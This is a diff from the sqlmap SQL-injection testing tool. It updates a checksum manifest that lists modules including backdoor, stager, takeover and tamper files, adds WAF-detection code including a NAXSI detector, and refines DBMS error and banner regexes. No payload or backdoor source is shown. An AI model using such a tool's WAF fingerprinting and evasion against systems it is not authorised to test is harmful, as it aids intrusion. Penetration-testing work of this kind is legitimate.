1ec370ec9d037135607b48ad6afd4f40 lib/request/connect.py
|
||||
fb6b788d0016ab4ec5e5f661f0f702ad lib/request/direct.py
|
||||
cc1163d38e9b7ee5db2adac6784c02bb lib/request/dns.py
|
||||
5dcdb37823a0b5eff65cd1018bcf09e4 lib/request/httpshandler.py
|
||||
310efc965c862cfbd7b0da5150a5ad36 lib/request/__init__.py
|
||||
70ec3f5bce37cdd7bf085ba2ddda30ac lib/request/inject.py
|
||||
f7660e11e23e977b00922e241b1a3000 lib/request/inject.py
|
||||
dc1e0af84ee8eb421797d61c8cb8f172 lib/request/methodrequest.py
|
||||
bb9c165b050f7696b089b96b5947fac3 lib/request/pkihandler.py
|
||||
602d4338a9fceaaee40c601410d8ac0b lib/request/rangehandler.py
|
||||
111b3ee936f23167b5654a5f72e9731b lib/request/redirecthandler.py
|
||||
20a0e6dac2edcf98fa8c47ee9a332c28 lib/request/templates.py
|
||||
992a02767d12254784f15501a7ab8dd8 lib/takeover/abstraction.py
|
||||
021a3bf20bcea047ab5601e8af736fee lib/request/redirecthandler.py
|
||||
b373770137dc885889e495de95169b93 lib/request/templates.py
|
||||
3790c378a58ec7635d7d83efef5c1032 lib/takeover/abstraction.py
|
||||
c6bc7961a186baabe0a9f5b7e0d8974b lib/takeover/icmpsh.py
|
||||
310efc965c862cfbd7b0da5150a5ad36 lib/takeover/__init__.py
|
||||
c90c993b020a6ae0f0e497fd84f37466 lib/takeover/metasploit.py
|
||||
ac541a0d38e4ecb4e41e97799a7235f4 lib/takeover/registry.py
|
||||
d466eab3ff82dbe29dc820e303eb4cff lib/takeover/udf.py
|
||||
e7f3012f4f9e822d39eabd934d050b0e lib/takeover/web.py
|
||||
604b087dc52dbcb4c3938ad1bf63829c lib/takeover/xp_cmdshell.py
|
||||
9f03972ea5ce2df74d43be5f30f068eb lib/techniques/blind/inference.py
|
||||
ff1af7f85fdf4f2a5369f2927d149824 lib/takeover/udf.py
|
||||
8df5a334823b724a2207a28c94f6fe3d lib/takeover/web.py
|
||||
b4c3264b9b6dcbf00cb7bffa447d1f6c lib/takeover/xp_cmdshell.py
|
||||
8ee04b14ce8a71996b9df83bf709fb55 lib/techniques/blind/inference.py
|
||||
310efc965c862cfbd7b0da5150a5ad36 lib/techniques/blind/__init__.py
|
||||
310efc965c862cfbd7b0da5150a5ad36 lib/techniques/dns/__init__.py
|
||||
ab1601a7f429b47637c4fb8af703d0f1 lib/techniques/dns/test.py
|
||||
d3da4c7ceaf57c4687a052d58722f6bb lib/techniques/dns/use.py
|
||||
310efc965c862cfbd7b0da5150a5ad36 lib/techniques/error/__init__.py
|
||||
8e918c27b796dada3f87ed2fafeb9d8c lib/techniques/error/use.py
|
||||
84b729215fd00e789ed75d9c00c97761 lib/techniques/error/use.py
|
||||
310efc965c862cfbd7b0da5150a5ad36 lib/techniques/__init__.py
|
||||
310efc965c862cfbd7b0da5150a5ad36 lib/techniques/union/__init__.py
|
||||
211e6dc49af6ad6bd3590d16d41e86db lib/techniques/union/test.py
|
||||
d17ca7177a29d7d07094fc7dd747d4c5 lib/techniques/union/use.py
|
||||
67f0ad96ec2207d7e59c788b858afd6d lib/utils/api.py
|
||||
d71e48e6fd08f75cc612bf8b260994ce lib/techniques/union/test.py
|
||||
db3090ff9a740ba096ba676fcf44ebfc lib/techniques/union/use.py
|
||||
431a0bb6b25cdabd881ca182f3a2dc9d lib/utils/api.py
|
||||
7d10ba0851da8ee9cd3c140dcd18798e lib/utils/brute.py
|
||||
ed70f1ca9113664043ec9e6778e48078 lib/utils/crawler.py
|
||||
c08d2487a53a1db8170178ebcf87c864 lib/utils/crawler.py
|
||||
ba12c69a90061aa14d848b8396e79191 lib/utils/deps.py
|
||||
3b9fd519164e0bf275d5fd361c3f11ff lib/utils/getch.py
|
||||
fee8a47fdbd3b2fe93a5afade80e68e7 lib/utils/har.py
|
||||
ccfdad414ce2ec0c394c3deaa39a82bf lib/utils/hashdb.py
|
||||
12e0e0ab70c6fe5786bc561c35dc067f lib/utils/hash.py
|
||||
e76a08237ee6a4cd6855af79610ea8a5 lib/utils/htmlentities.py
|
||||
@@ -111,39 +112,39 @@ e76a08237ee6a4cd6855af79610ea8a5 lib/utils/htmlentities.py
|
||||
8520a745c9b4db3814fe46f4c34c6fbc lib/utils/progress.py
|
||||
2c3638d499f3c01c34187e531f77d004 lib/utils/purge.py
|
||||
4bd7dd4fc8f299f1566a26ed6c2cefb5 lib/utils/search.py
|
||||
569521a83b2b6c62497879267b963b21 lib/utils/sqlalchemy.py
|
||||
fe2be081f924abf08767ed89ab12b418 lib/utils/sqlalchemy.py
|
||||
caeea96ec9c9d489f615f282259b32ca lib/utils/timeout.py
|
||||
6fa36b9742293756b226cddee11b7d52 lib/utils/versioncheck.py
|
||||
31c51a3cc73120ee9490f2e3fa6d0dca lib/utils/xrange.py
|
||||
b90aae84100a6c4c2bd5eeb4197fbc6e plugins/dbms/access/connector.py
|
||||
ee9cb5dd37a31643cbf4c98ef3a0bdf0 plugins/dbms/access/connector.py
|
||||
a71f7c8ffcb9b250cc785cad830e8980 plugins/dbms/access/enumeration.py
|
||||
38a0c758d9b86915fce894b779e79e4d plugins/dbms/access/filesystem.py
|
||||
fe34217a0b79ac25e3af007dd46cd340 plugins/dbms/access/fingerprint.py
|
||||
5a691580a59eca29bae2283b57682025 plugins/dbms/access/__init__.py
|
||||
c12f4f266830636462eac98e35ebb73e plugins/dbms/access/syntax.py
|
||||
3fc75c350a30597962bc692c973eeeb3 plugins/dbms/access/takeover.py
|
||||
a763887d6e6e99c5a73d9cf450cd84fe plugins/dbms/db2/connector.py
|
||||
17dd890f91c1cde837fbef04327e9cca plugins/dbms/db2/connector.py
|
||||
9d54e01e1576a423159f0e47aeb2837a plugins/dbms/db2/enumeration.py
|
||||
667e50aa06883f0f194bef335015d694 plugins/dbms/db2/filesystem.py
|
||||
9c6ef13c056a256e4704b924af0d7cc6 plugins/dbms/db2/fingerprint.py
|
||||
35ed6e262cf68d4ab2c6111dd5fb0414 plugins/dbms/db2/__init__.py
|
||||
ce8bc86383f2ade41e08f2dbee1844bf plugins/dbms/db2/syntax.py
|
||||
744fb5044f2b9f9d5ebda6e3f08e3be7 plugins/dbms/db2/takeover.py
|
||||
b8dcd6e97166f58ee452e68c46bfe2c4 plugins/dbms/firebird/connector.py
|
||||
4b96106c07daf55892f9420dd7a25b37 plugins/dbms/firebird/connector.py
|
||||
147afe5f4a3d09548a8a1dbc954fe29e plugins/dbms/firebird/enumeration.py
|
||||
4e421504f59861bf1ed1a89abda583d1 plugins/dbms/firebird/filesystem.py
|
||||
d5d19126fec00967932dc75fe7880d6d plugins/dbms/firebird/fingerprint.py
|
||||
f86ace7fcaea5ff3f9e86ab2dce052c5 plugins/dbms/firebird/__init__.py
|
||||
04f7c2977ab5198c6f4aa6233b872ae0 plugins/dbms/firebird/syntax.py
|
||||
1cb1ab93e4b8c97e81586acfe4d030a2 plugins/dbms/firebird/takeover.py
|
||||
3a97bd07cce66bc812309341e7b54697 plugins/dbms/hsqldb/connector.py
|
||||
6fec735f19cf1541729e17bdb6b30f9a plugins/dbms/hsqldb/connector.py
|
||||
6d76854ebce4cad900b47a124a1867a9 plugins/dbms/hsqldb/enumeration.py
|
||||
c0b14e62e1ecbb679569a1abb9cf1913 plugins/dbms/hsqldb/filesystem.py
|
||||
cf5681143cd900fdf198ecd574842ecb plugins/dbms/hsqldb/fingerprint.py
|
||||
0b18e3cf582b128cf9f16ee34ef85727 plugins/dbms/hsqldb/__init__.py
|
||||
65e8f8edc9d18fe482deb474a29f83ff plugins/dbms/hsqldb/syntax.py
|
||||
0a1584e2b01f33abe3ef91d99bafbd3f plugins/dbms/hsqldb/takeover.py
|
||||
f8eaeb71239369e6ceff47596439871b plugins/dbms/informix/connector.py
|
||||
ed489d7e8803e26e1f301da20a72d2bd plugins/dbms/informix/connector.py
|
||||
989e75a65503dd648a45258217ae3371 plugins/dbms/informix/enumeration.py
|
||||
667e50aa06883f0f194bef335015d694 plugins/dbms/informix/filesystem.py
|
||||
f06d263b2c9b52ea7a120593eb5806c4 plugins/dbms/informix/fingerprint.py
|
||||
@@ -152,58 +153,58 @@ f06d263b2c9b52ea7a120593eb5806c4 plugins/dbms/informix/fingerprint.py
|
||||
744fb5044f2b9f9d5ebda6e3f08e3be7 plugins/dbms/informix/takeover.py
|
||||
310efc965c862cfbd7b0da5150a5ad36 plugins/dbms/__init__.py
|
||||
e50b624ff23c3e180d80e065deb1763f plugins/dbms/maxdb/connector.py
|
||||
affabeab69a2c5d4fc66f84b5aeaf24a plugins/dbms/maxdb/enumeration.py
|
||||
2a1b3f3df045c3a00748a13f5166d733 plugins/dbms/maxdb/enumeration.py
|
||||
815ea8e7b9bd714d73d9d6c454aff774 plugins/dbms/maxdb/filesystem.py
|
||||
017c723354eff28188773670d3837c01 plugins/dbms/maxdb/fingerprint.py
|
||||
c03001c1f70e76de39d26241dfcbd033 plugins/dbms/maxdb/__init__.py
|
||||
e6036f5b2e39aec37ba036a8cf0efd6f plugins/dbms/maxdb/syntax.py
|
||||
0be362015605e26551e5d79cc83ed466 plugins/dbms/maxdb/takeover.py
|
||||
e3e78fab9b5eb97867699f0b20e59b62 plugins/dbms/mssqlserver/connector.py
|
||||
9b3a681ff4087824fb43e23679057fa3 plugins/dbms/mssqlserver/connector.py
|
||||
b8de437eaa3e05c3db666968b7d142e4 plugins/dbms/mssqlserver/enumeration.py
|
||||
5de6074ee2f7dc5b04b70307d36dbe1d plugins/dbms/mssqlserver/filesystem.py
|
||||
13cb15e8abfb05818e6f66c687b78664 plugins/dbms/mssqlserver/fingerprint.py
|
||||
77db701972e01e50a61be528e6cad6e2 plugins/dbms/mssqlserver/filesystem.py
|
||||
5207943c31e166a70d5fc7cec8b5ef18 plugins/dbms/mssqlserver/fingerprint.py
|
||||
40bd890988f9acd3942255d687445371 plugins/dbms/mssqlserver/__init__.py
|
||||
400ce654ff6bc57a40fb291322a18282 plugins/dbms/mssqlserver/syntax.py
|
||||
20c669e084ea4d6b968a5834f7fec66c plugins/dbms/mssqlserver/takeover.py
|
||||
48fb283a0dbf980495ca054f7b55783f plugins/dbms/mysql/connector.py
|
||||
f55e550802cc33bec20213da89e2cfdf plugins/dbms/mysql/connector.py
|
||||
7fe94b803fa273baf479b76ce7a3fb51 plugins/dbms/mysql/enumeration.py
|
||||
1bd5e659962e814b66a451b807de9110 plugins/dbms/mysql/filesystem.py
|
||||
e43fda42decf2a70bad470b884674fbe plugins/dbms/mysql/fingerprint.py
|
||||
42568a66a13a43ed46748290c503a652 plugins/dbms/mysql/__init__.py
|
||||
96dfafcc4aecc1c574148ac05dbdb6da plugins/dbms/mysql/syntax.py
|
||||
33b2dc28075ab560fd8a4dc898682a0d plugins/dbms/mysql/takeover.py
|
||||
ea4b9cd238075b79945bd2607810934a plugins/dbms/oracle/connector.py
|
||||
73fc1502dff934f008e3e2590b2609e7 plugins/dbms/oracle/enumeration.py
|
||||
1766b6ad38da5876c257e268bf5004a1 plugins/dbms/oracle/connector.py
|
||||
0471e3bf8310064e28e7c36064056e8d plugins/dbms/oracle/enumeration.py
|
||||
dc5962a1d4d69d4206b6c03e00e7f33d plugins/dbms/oracle/filesystem.py
|
||||
525381f48505095b14e567c1f59ca9c7 plugins/dbms/oracle/fingerprint.py
|
||||
25a99a9dd7072b6b7346438599c78050 plugins/dbms/oracle/__init__.py
|
||||
783d4795fac75f73a7cfba3cd9c3d01c plugins/dbms/oracle/syntax.py
|
||||
c05176f6efe66069756fb78dfa0ed3f6 plugins/dbms/oracle/takeover.py
|
||||
e087d54b9b2617a9f40be15a2bd478c2 plugins/dbms/postgresql/connector.py
|
||||
0451175199516bd47114c50338489a2f plugins/dbms/postgresql/connector.py
|
||||
8377c5ab3de500f9a495fcd9e2a75d3e plugins/dbms/postgresql/enumeration.py
|
||||
48822058c620ffaa2acc599b4d39c667 plugins/dbms/postgresql/filesystem.py
|
||||
c10df993e8b243ba3d6a94e8ae28a875 plugins/dbms/postgresql/fingerprint.py
|
||||
a3a4e82e9a68329c44762897c87acfec plugins/dbms/postgresql/__init__.py
|
||||
76bde1ffb3040ae709156449a583e9ed plugins/dbms/postgresql/syntax.py
|
||||
286f95526a6ce0b8ae9bff6fc3117af0 plugins/dbms/postgresql/takeover.py
|
||||
719fdd12e360458e822950f245d67ad0 plugins/dbms/sqlite/connector.py
|
||||
0119dcaa1d785576cb2709e204b2a432 plugins/dbms/sqlite/connector.py
|
||||
28b9d7d0614e52275a30b5a57fc76027 plugins/dbms/sqlite/enumeration.py
|
||||
954e503cfc8dd1acf9fc50868f5dafb0 plugins/dbms/sqlite/filesystem.py
|
||||
ee430d142fa8f9ee571578d0a0916679 plugins/dbms/sqlite/fingerprint.py
|
||||
6b17cc8cc94a912a0a5cf15acbad5ba4 plugins/dbms/sqlite/__init__.py
|
||||
4827722159a89652005f49265bb55c43 plugins/dbms/sqlite/syntax.py
|
||||
02ab8ff465da9dd31ffe6a963c676180 plugins/dbms/sqlite/takeover.py
|
||||
e3e78fab9b5eb97867699f0b20e59b62 plugins/dbms/sybase/connector.py
|
||||
9b3a681ff4087824fb43e23679057fa3 plugins/dbms/sybase/connector.py
|
||||
e98b82180be4fc5bbf4dfe7247afcbfe plugins/dbms/sybase/enumeration.py
|
||||
62d772c7cd08275e3503304ba90c4e8a plugins/dbms/sybase/filesystem.py
|
||||
deed74334b637767fc9de8f74b37647a plugins/dbms/sybase/fingerprint.py
|
||||
45436a42c2bb8075e1482a950d993d55 plugins/dbms/sybase/__init__.py
|
||||
89412a921c8c598c19d36762d5820f05 plugins/dbms/sybase/syntax.py
|
||||
654cd5e69cf5e5c644bfa5d284e61206 plugins/dbms/sybase/takeover.py
|
||||
be7481a96214220bcd8f51ca00239bed plugins/generic/connector.py
|
||||
f700954549ad8ebf77f5187262fb9af0 plugins/generic/connector.py
|
||||
5390591ca955036d492de11355b52e8f plugins/generic/custom.py
|
||||
4ad4bccc03256b8f3d21ba4f8f759404 plugins/generic/databases.py
|
||||
5eae2e0992a719bfce9cf78ed0a0ea2f plugins/generic/entries.py
|
||||
9fc0c45c314e597fd6ae3b0068daafc0 plugins/generic/databases.py
|
||||
106f19c1d895963e2efa8ee193a537ec plugins/generic/entries.py
|
||||
55802d1d5d65938414c77ccc27731cab plugins/generic/enumeration.py
|
||||
0d10a0410c416fece51c26a935e68568 plugins/generic/filesystem.py
|
||||
2e397afd83939889d1a7a07893b19ae7 plugins/generic/fingerprint.py
|
||||
@@ -212,7 +213,7 @@ be7481a96214220bcd8f51ca00239bed plugins/generic/connector.py
|
||||
070f58c52e2a04e7a9896b42b2d17dc2 plugins/generic/search.py
|
||||
562cfa80a15d5f7f1d52e10c5736d7e2 plugins/generic/syntax.py
|
||||
fca9946e960942cc9b22ef26e12b8b3a plugins/generic/takeover.py
|
||||
156ea264f3f1c7fc18faa251cc1f1a4b plugins/generic/users.py
|
||||
f5c3c5da9ef0f265dc28becbf75ff5e9 plugins/generic/users.py
|
||||
310efc965c862cfbd7b0da5150a5ad36 plugins/__init__.py
|
||||
b04db3e861edde1f9dd0a3850d5b96c8 shell/backdoor.asp_
|
||||
158bfa168128393dde8d6ed11fe9a1b8 shell/backdoor.aspx_
|
||||
@@ -222,8 +223,8 @@ b04db3e861edde1f9dd0a3850d5b96c8 shell/backdoor.asp_
|
||||
c3cc8b7727161e64ab59f312c33b541a shell/stager.aspx_
|
||||
1f7f125f30e0e800beb21e2ebbab18e1 shell/stager.jsp_
|
||||
01e3505e796edf19aad6a996101c81c9 shell/stager.php_
|
||||
0751a45ac4c130131f2cdb74d866b664 sqlmapapi.py
|
||||
d715e78922d1b6bee7c9c03fdfa7ccfd sqlmap.py
|
||||
5a6614331f93051efed1df4f2dcdc067 sqlmapapi.py
|
||||
41a637eda3e182d520fa4fb435edc1ec sqlmap.py
|
||||
08c711a470d7e0bf705320ba3c48b886 tamper/apostrophemask.py
|
||||
e8509df10d3f1c28014d7825562d32dd tamper/apostrophenullencode.py
|
||||
bb27f7dc980ea07fcfedbd7da5e5e029 tamper/appendnullbyte.py
|
||||
@@ -239,12 +240,13 @@ f341a48112354a50347546fa73f4f531 tamper/commalessmid.py
|
||||
28c21fd9c9801d398698c646bb894260 tamper/concat2concatws.py
|
||||
d496b8abd40ea1a86c771d9d20174f61 tamper/equaltolike.py
|
||||
fb3c31b72675f6ef27fa420a4e974a55 tamper/escapequotes.py
|
||||
9efcdbfd3012d3c84ee67e87550d8432 tamper/greatest.py
|
||||
a5770c537c7e05510108af62fa0ad7b0 tamper/greatest.py
|
||||
b3df54fef913223b4f4fd90aa122870f tamper/halfversionedmorekeywords.py
|
||||
a3a0e76922b4f40f422a0daca4e71af3 tamper/htmlencode.py
|
||||
6fa2d48bf8a1020a07d1cb95a14688a8 tamper/ifnull2ifisnull.py
|
||||
8f1626a68b060162023e67b4a4cd9295 tamper/informationschemacomment.py
|
||||
310efc965c862cfbd7b0da5150a5ad36 tamper/__init__.py
|
||||
bff6c89873a75248f6bd68b62a6d86cf tamper/least.py
|
||||
8b9ed7d7d9c8197f34b9d8e36323b60e tamper/lowercase.py
|
||||
377bffa19f0b7ca0616fcea2681db827 tamper/modsecurityversioned.py
|
||||
14a2c4ea49661056a7a6077f91fbc2ed tamper/modsecurityzeroversioned.py
|
||||
@@ -264,7 +266,7 @@ b2331640743170f82be9a8c27f65b206 tamper/space2morecomment.py
|
||||
507a174c64345df8df003ddba93c8cd1 tamper/space2morehash.py
|
||||
0ce89b0d602abbd64344ab038be8acbc tamper/space2mssqlblank.py
|
||||
fa66af20648b5538289748abe7a08fe6 tamper/space2mssqlhash.py
|
||||
ca7597ba264ec731b8a73e9cad5334eb tamper/space2mysqlblank.py
|
||||
b5abc11a45e9646cd0e296548c42e787 tamper/space2mysqlblank.py
|
||||
038b8ea90f9a3a45b9bc67fcdff38511 tamper/space2mysqldash.py
|
||||
5665c217ef8998bfd18f9ef1d8c617bd tamper/space2plus.py
|
||||
a30fa43203d960c7a9d8709bf24ca401 tamper/space2randomblank.py
|
||||
@@ -388,7 +390,7 @@ a0200fc79bae0ec597b98c82894562a5 waf/armor.py
|
||||
d764bf3b9456a02a7f8a0149a93ff950 waf/aws.py
|
||||
dbc89fc642074c6d17a04532e623f976 waf/baidu.py
|
||||
e4e713cc4e5504eed0311fa62b05a6f9 waf/barracuda.py
|
||||
81af1707c0783d205075d887c9868043 waf/bigip.py
|
||||
03df7b2cfccc5eb6b4a6fe987cdb004d waf/bigip.py
|
||||
2adee01cbf513944cd3d281af1c05a86 waf/binarysec.py
|
||||
db312318ee5309577917faca1cd2c077 waf/blockdos.py
|
||||
520ef7b59340b96b4a43e7fdba760967 waf/ciscoacexml.py
|
||||
@@ -401,7 +403,7 @@ ab6f6e3169cb43efcf5b6ed84b58252f waf/comodo.py
|
||||
e4b058d759198216d24f8fed6ef97be4 waf/edgecast.py
|
||||
f633953970fb181b9ac5420a47e6a610 waf/expressionengine.py
|
||||
1df78b6ad49259514cb6e4d68371cbcf waf/fortiweb.py
|
||||
ef151fbc34f16620958ba61dd415ae59 waf/generic.py
|
||||
f183f0bd0923917f070984caf987d5d7 waf/generic.py
|
||||
d50e17ed49e1a3cb846e652ed98e3b3c waf/hyperguard.py
|
||||
5b5382ccfb82ee6afdc1b47c8a4bce70 waf/incapsula.py
|
||||
310efc965c862cfbd7b0da5150a5ad36 waf/__init__.py
|
||||
@@ -410,6 +412,7 @@ d50e17ed49e1a3cb846e652ed98e3b3c waf/hyperguard.py
|
||||
0b50798c12802bf98a850dd716b0d96d waf/knownsec.py
|
||||
bb4177a5a1b4a8d590bf556b409625ac waf/kona.py
|
||||
4fed33de1ffb2214bc1baa9f925c3eb9 waf/modsecurity.py
|
||||
3fc363c592e82e2b1f8f76fad8adafac waf/naxsi.py
|
||||
fe690dfc4b2825c3682ceecef7ee9e6e waf/netcontinuum.py
|
||||
bd55ed30291b31db63b761db472f41ea waf/netscaler.py
|
||||
cbd497453509f144a71f8c05fd504453 waf/newdefend.py
|
||||
@@ -439,24 +442,24 @@ f3727ed5d1b5b06495233c413c8687a6 waf/wallarm.py
|
||||
3792fb08791f0f77fa5386f6e9374068 waf/webknight.py
|
||||
76c50593f1fbb8d4e87ff4781688e728 waf/yundun.py
|
||||
83a57aff89cf698b3e4aac9814a03e67 waf/yunsuo.py
|
||||
2d53fdaca0d7b42edad5192661248d76 xml/banner/cookie.xml
|
||||
e87d59af23b7b18cd56c9883e5f02d5c xml/banner/generic.xml
|
||||
d8925c034263bf1b83e7d8e1c78eec57 xml/banner/mssql.xml
|
||||
c97c383b560cd578f74c5e4d88c88ed2 xml/banner/mysql.xml
|
||||
b8b56f4aa34bf65365808919b97119a7 xml/banner/mysql.xml
|
||||
9b262a617b06af56b1267987d694bf6f xml/banner/oracle.xml
|
||||
d90fe5a47b95dff3eb1797764c9db6c5 xml/banner/postgresql.xml
|
||||
b07b5c47c751787e136650ded060197f xml/banner/server.xml
|
||||
d48c971769c6131e35bd52d2315a8d58 xml/banner/servlet.xml
|
||||
d48c971769c6131e35bd52d2315a8d58 xml/banner/servlet-engine.xml
|
||||
2d53fdaca0d7b42edad5192661248d76 xml/banner/set-cookie.xml
|
||||
d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml
|
||||
350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml
|
||||
817078783e1edaa492773d3b34d8eef0 xml/banner/x-powered-by.xml
|
||||
fb93505ef0ab3b4a20900f3e5625260d xml/boundaries.xml
|
||||
535d625cff8418bdc086ab4e1bbf5135 xml/errors.xml
|
||||
9567590d35dfd9f214b9979e6000b139 xml/errors.xml
|
||||
a279656ea3fcb85c727249b02f828383 xml/livetests.xml
|
||||
14a2abeb88b00ab489359d0dd7a3017f xml/payloads/boolean_blind.xml
|
||||
5a4ec9aaac9129205b88f2a7df9ffb27 xml/payloads/error_based.xml
|
||||
b5b8b0aebce810e6cdda1b7106c96427 xml/payloads/error_based.xml
|
||||
06b1a210b190d52477a9d492443725b5 xml/payloads/inline_query.xml
|
||||
3194e2688a7576e1f877d5b137f7c260 xml/payloads/stacked_queries.xml
|
||||
c2d8dd03db5a663e79eabb4495dd0723 xml/payloads/time_blind.xml
|
||||
ac649aff0e7db413e4937e446e398736 xml/payloads/union_query.xml
|
||||
5bd467d86d7cb55fbe5f66e4ff9a6bec xml/queries.xml
|
||||
8f984712da3f23f105fc0b3391114e4b xml/queries.xml
|
||||
|
||||
@@ -18,6 +18,7 @@ def detect(get_page):
|
||||
for vector in WAF_ATTACK_VECTORS:
|
||||
_, headers, _ = get_page(get=vector)
|
||||
retval = headers.get("X-Cnection", "").lower() == "close"
|
||||
retval |= headers.get("X-WA-Info") is not None
|
||||
retval |= re.search(r"\ATS\w{4,}=", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
|
||||
retval |= re.search(r"BigIP|BIGipServer", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
|
||||
retval |= re.search(r"BigIP|BIGipServer", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
|
||||
|
||||
@@ -5,6 +5,7 @@ Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
||||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
from lib.core.option import kb
|
||||
from lib.core.settings import IDS_WAF_CHECK_PAYLOAD
|
||||
from lib.core.settings import WAF_ATTACK_VECTORS
|
||||
|
||||
@@ -13,7 +14,7 @@ __product__ = "Generic (Unknown)"
|
||||
def detect(get_page):
|
||||
retval = False
|
||||
|
||||
page, _, code = get_page()
|
||||
page, headers, code = get_page()
|
||||
if page is None or code >= 400:
|
||||
return False
|
||||
|
||||
@@ -21,6 +22,9 @@ def detect(get_page):
|
||||
page, _, code = get_page(get=vector)
|
||||
|
||||
if code >= 400 or IDS_WAF_CHECK_PAYLOAD in vector and code is None:
|
||||
if code is not None:
|
||||
kb.wafSpecificResponse = "HTTP/1.1 %s\n%s\n%s" % (code, "".join(_ for _ in headers.headers or [] if not _.startswith("URI")), page)
|
||||
|
||||
retval = True
|
||||
break
|
||||
|
||||
|
||||
24
waf/naxsi.py
Normal file
24
waf/naxsi.py
Normal file
@@ -0,0 +1,24 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
||||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
import re
|
||||
|
||||
from lib.core.enums import HTTP_HEADER
|
||||
from lib.core.settings import WAF_ATTACK_VECTORS
|
||||
|
||||
__product__ = "NAXSI (NBS System)"
|
||||
|
||||
def detect(get_page):
|
||||
retval = False
|
||||
|
||||
for vector in WAF_ATTACK_VECTORS:
|
||||
_, headers, _ = get_page(get=vector)
|
||||
retval = re.search(r"naxsi/waf", headers.get(HTTP_HEADER.X_DATA_ORIGIN, ""), re.I) is not None
|
||||
if retval:
|
||||
break
|
||||
|
||||
return retval
|
||||
@@ -27,6 +27,14 @@
|
||||
<info dbms_version="1" type="Linux" distrib="Debian" release="4.0" codename="etch"/>
|
||||
</regexp>
|
||||
|
||||
<regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+lenny">
|
||||
<info dbms_version="1" type="Linux" distrib="Debian" release="5.0" codename="lenny"/>
|
||||
</regexp>
|
||||
|
||||
<regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+squeeze">
|
||||
<info dbms_version="1" type="Linux" distrib="Debian" release="6.0" codename="squeeze"/>
|
||||
</regexp>
|
||||
|
||||
<regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+(sid|unstable)">
|
||||
<info dbms_version="1" type="Linux" distrib="Debian" codename="unstable"/>
|
||||
</regexp>
|
||||
@@ -35,8 +43,4 @@
|
||||
<info dbms_version="1" type="Linux" distrib="Debian" codename="testing"/>
|
||||
</regexp>
|
||||
|
||||
<!-- Ubuntu -->
|
||||
<regexp value="^(5\.0\.67)-0ubuntu6">
|
||||
<info dbms_version="1" type="Linux" distrib="Ubuntu" release="8.10" codename="Intrepid Ibex"/>
|
||||
</regexp>
|
||||
</root>
|
||||
|
||||
@@ -3,8 +3,8 @@
|
||||
<root>
|
||||
<!-- MySQL -->
|
||||
<dbms value="MySQL">
|
||||
<error regexp="SQL syntax.*MySQL"/>
|
||||
<error regexp="Warning.*mysql_.*"/>
|
||||
<error regexp="SQL syntax.*?MySQL"/>
|
||||
<error regexp="Warning.*?mysql_"/>
|
||||
<error regexp="MySqlException \(0x"/>
|
||||
<error regexp="valid MySQL result"/>
|
||||
<error regexp="check the manual that corresponds to your (MySQL|MariaDB) server version"/>
|
||||
@@ -14,24 +14,24 @@
|
||||
|
||||
<!-- PostgreSQL -->
|
||||
<dbms value="PostgreSQL">
|
||||
<error regexp="PostgreSQL.*ERROR"/>
|
||||
<error regexp="Warning.*\Wpg_.*"/>
|
||||
<error regexp="PostgreSQL.*?ERROR"/>
|
||||
<error regexp="Warning.*?\Wpg_"/>
|
||||
<error regexp="valid PostgreSQL result"/>
|
||||
<error regexp="Npgsql\."/>
|
||||
<error regexp="PG::SyntaxError:"/>
|
||||
<error regexp="org\.postgresql\.util\.PSQLException"/>
|
||||
<error regexp="ERROR:\s\ssyntax error at or near "/>
|
||||
<error regexp="ERROR:\s\ssyntax error at or near"/>
|
||||
</dbms>
|
||||
|
||||
<!-- Microsoft SQL Server -->
|
||||
<dbms value="Microsoft SQL Server">
|
||||
<error regexp="Driver.* SQL[\-\_\ ]*Server"/>
|
||||
<error regexp="OLE DB.* SQL Server"/>
|
||||
<error regexp="Driver.*? SQL[\-\_\ ]*Server"/>
|
||||
<error regexp="OLE DB.*? SQL Server"/>
|
||||
<error regexp="\bSQL Server[^<"]+Driver"/>
|
||||
<error regexp="Warning.*(mssql|sqlsrv)_"/>
|
||||
<error regexp="Warning.*?(mssql|sqlsrv)_"/>
|
||||
<error regexp="\bSQL Server[^<"]+[0-9a-fA-F]{8}"/>
|
||||
<error regexp="System\.Data\.SqlClient\.SqlException"/>
|
||||
<error regexp="(?s)Exception.*\WRoadhouse\.Cms\."/>
|
||||
<error regexp="(?s)Exception.*?\WRoadhouse\.Cms\."/>
|
||||
<error regexp="Microsoft SQL Native Client error '[0-9a-fA-F]{8}"/>
|
||||
<error regexp="com\.microsoft\.sqlserver\.jdbc\.SQLServerException"/>
|
||||
<error regexp="ODBC SQL Server Driver"/>
|
||||
@@ -53,16 +53,17 @@
|
||||
<dbms value="Oracle">
|
||||
<error regexp="\bORA-\d{5}"/>
|
||||
<error regexp="Oracle error"/>
|
||||
<error regexp="Oracle.*Driver"/>
|
||||
<error regexp="Warning.*\Woci_.*"/>
|
||||
<error regexp="Warning.*\Wora_.*"/>
|
||||
<error regexp="Oracle.*?Driver"/>
|
||||
<error regexp="Warning.*?\Woci_"/>
|
||||
<error regexp="Warning.*?\Wora_"/>
|
||||
<error regexp="oracle\.jdbc\.driver"/>
|
||||
<error regexp="quoted string not properly terminated"/>
|
||||
<error regexp="SQL command not properly ended"/>
|
||||
</dbms>
|
||||
|
||||
<!-- IBM DB2 -->
|
||||
<dbms value="IBM DB2">
|
||||
<error regexp="CLI Driver.*DB2"/>
|
||||
<error regexp="CLI Driver.*?DB2"/>
|
||||
<error regexp="DB2 SQL error"/>
|
||||
<error regexp="\bdb2_\w+\("/>
|
||||
<error regexp="SQLSTATE.+SQLCODE"/>
|
||||
@@ -70,7 +71,7 @@
|
||||
|
||||
<!-- Informix -->
|
||||
<dbms value="Informix">
|
||||
<error regexp="Exception.*Informix"/>
|
||||
<error regexp="Exception.*?Informix"/>
|
||||
